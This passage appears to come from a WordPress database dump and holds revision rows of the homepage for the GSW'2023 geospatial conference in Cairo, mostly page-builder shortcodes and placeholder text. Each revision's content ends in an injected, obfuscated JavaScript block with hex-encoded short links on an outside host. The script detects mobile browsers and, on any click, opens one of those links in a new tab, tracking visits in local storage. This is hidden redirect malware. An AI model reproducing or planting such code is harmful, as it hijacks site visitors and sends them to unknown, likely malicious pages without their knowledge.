|maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 14:49:41','2022-11-09 14:49:41','',3066,'https://gsw2023.com/?p=3120',0,'revision','',0),
(3122,1,'2022-11-09 15:00:20','2022-11-09 15:00:20','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"image\" awb_image_background_position=\"50% 50%\" awb_parallax=\"scroll\" awb_parallax_speed=\"0.5\" awb_image=\"3068\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:00:20','2022-11-09 15:00:20','',3066,'https://gsw2023.com/?p=3122',0,'revision','',0),
(3123,1,'2022-11-09 15:02:53','2022-11-09 15:02:53','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"image\" awb_stretch=\"1\" awb_image_size=\"large\" awb_image_background_size=\"contain\" awb_image_background_position=\"100% 100%\" awb_parallax=\"scroll\" awb_parallax_speed=\"0.5\" awb_image=\"3068\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" 